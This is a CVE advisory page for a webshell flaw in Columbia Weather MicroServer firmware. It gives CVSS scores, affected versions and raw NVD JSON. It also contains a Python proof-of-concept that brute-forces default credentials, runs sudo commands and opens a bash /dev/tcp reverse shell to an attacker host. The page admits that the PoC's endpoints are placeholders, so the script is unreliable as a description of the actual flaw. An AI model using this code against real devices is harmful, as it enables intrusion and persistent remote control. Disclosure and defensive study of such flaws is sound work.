Security Vulnerability Report
CVE-2025-66620 CVSS 8.0 HIGH

CVE-2025-66620

Published: 2026-01-07 21:15:59
Last Modified: 2026-01-22 17:33:55

Description

An unused webshell in MicroServer allows unlimited login attempts, with sudo rights on certain files and directories. An attacker with admin access to MicroServer can gain limited shell access, enabling persistence through reverse shells, and the ability to modify or remove data stored in the file system.

CVSS Details

CVSS Score
8.0
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
This 8.0 score is the secondary v3.1 metric; the raw record below also carries the NVD primary v3.1 score of 7.2 (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H) and a v4.0 score of 8.6, which differ from the vector above on attack vector and privileges required.

Configurations (Affected Products)

cpe:2.3:o:columbiaweather:weather_microserver_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:columbiaweather:weather_microserver:-:*:*:*:*:*:*:* - NOT VULNERABLE
MicroServer (all unpatched versions; the configuration data below lists firmware versions before MS_4.1_14142 as affected)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. The endpoint path and request/response format it uses are placeholders (the script itself marks the path as an example to be adjusted), not details given in the description or raw record on this page.
python
#!/usr/bin/env python3 """ CVE-2025-66620 PoC - MicroServer Unused Webshell Exploitation Note: This PoC is for educational and authorized security testing purposes only. This script demonstrates the vulnerability where an unused webshell in MicroServer allows unlimited login attempts with sudo rights on certain files and directories. """ import requests import sys import socket import base64 # Configuration TARGET_IP = "<target_ip>" TARGET_PORT = 443 WEB_SHELL_PATH = "/api/webshell" # Example path, adjust based on enumeration def check_webshell_exists(): """Check if the unused webshell endpoint exists.""" try: response = requests.get(f"https://{TARGET_IP}:{TARGET_PORT}{WEB_SHELL_PATH}", verify=False, timeout=10) if response.status_code == 200: print(f"[+] Webshell endpoint found at {WEB_SHELL_PATH}") return True except requests.RequestException as e: print(f"[-] Error checking webshell: {e}") return False def brute_force_login(): """ Since the webshell allows unlimited login attempts, this function demonstrates attempting multiple credentials. In real scenarios, this would be combined with weak/default credentials. 
""" print("[*] Attempting to exploit unlimited login attempts...") # Common weak credentials to try credentials = [ ("admin", "admin"), ("admin", "password"), ("root", "root"), ("administrator", "administrator"), ("admin", ""), ] for username, password in credentials: try: login_data = { "username": username, "password": password } response = requests.post( f"https://{TARGET_IP}:{TARGET_PORT}{WEB_SHELL_PATH}/login", json=login_data, verify=False, timeout=10 ) if response.status_code == 200 and "session" in response.text: print(f"[+] Successful login with {username}:{password}") return response.json().get("session_token") except requests.RequestException: continue print("[-] Login attempts did not succeed") return None def execute_command(session_token, command): """Execute commands through the webshell with sudo privileges.""" try: headers = {"Authorization": f"Bearer {session_token}"} payload = { "command": base64.b64encode(command.encode()).decode(), "sudo": True # Exploiting sudo rights on certain files } response = requests.post( f"https://{TARGET_IP}:{TARGET_PORT}{WEB_SHELL_PATH}/exec", json=payload, headers=headers, verify=False, timeout=30 ) return response.json().get("output", "") except requests.RequestException as e: return f"Error: {e}" def establish_reverse_shell(session_token, attacker_ip, attacker_port): """Establish a reverse shell for persistence.""" reverse_shell_cmd = f"bash -i >& /dev/tcp/{attacker_ip}/{attacker_port} 0>&1" encoded_cmd = base64.b64encode(reverse_shell_cmd.encode()).decode() # Create and execute reverse shell payload payload_creation = f"echo {encoded_cmd} | base64 -d | bash" result = execute_command(session_token, payload_creation) print(f"[*] Reverse shell payload sent to {attacker_ip}:{attacker_port}") return result def main(): print("[*] CVE-2025-66620 PoC - MicroServer Unused Webshell") print("[*] Target: MicroServer with unused webshell vulnerability") # Step 1: Check if webshell exists if not check_webshell_exists(): 
print("[-] Webshell not found or not accessible") sys.exit(1) # Step 2: Exploit unlimited login attempts session_token = brute_force_login() if not session_token: print("[-] Failed to obtain session token") sys.exit(1) # Step 3: Execute commands with sudo privileges print("[*] Testing command execution with sudo privileges...") result = execute_command(session_token, "whoami") print(f"[+] Command output: {result}") # Step 4: Establish reverse shell for persistence ATTACKER_IP = "<attacker_ip>" ATTACKER_PORT = 4444 print(f"[*] Attempting to establish reverse shell to {ATTACKER_IP}:{ATTACKER_PORT}") establish_reverse_shell(session_token, ATTACKER_IP, ATTACKER_PORT) print("[*] Exploitation complete. Check for reverse shell connection.") if __name__ == "__main__": main() # Usage: # 1. Set TARGET_IP to the MicroServer IP address # 2. Start a netcat listener: nc -lvp 4444 # 3. Run the script with appropriate permissions # 4. Monitor the reverse shell connection # Disclaimer: Only use on systems you have explicit permission to test.

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66620", "sourceIdentifier": "[email protected]", "published": "2026-01-07T21:15:59.170", "lastModified": "2026-01-22T17:33:55.143", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An unused webshell in MicroServer allows unlimited login attempts, with sudo rights on certain files and directories. An attacker with admin access to MicroServer can gain limited shell access, enabling persistence through reverse shells, and the ability to modify or remove data stored in the file system."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", 
"valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.0, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.1, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-553"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:columbiaweather:weather_microserver_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "MS_4.1_14142", "matchCriteriaId": "85279FFA-8834-4778-8AD8-DB750EA8BBC6"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:columbiaweather:weather_microserver:-:*:*:*:*:*:*:*", "matchCriteriaId": "10FA303F-A9BC-43A0-9C9A-2362210FA0A0"}]}]}], "references": [{"url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-006-01.json", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-26-006-01", "source": "[email protected]", 
"tags": ["Third Party Advisory", "US Government Resource"]}]}}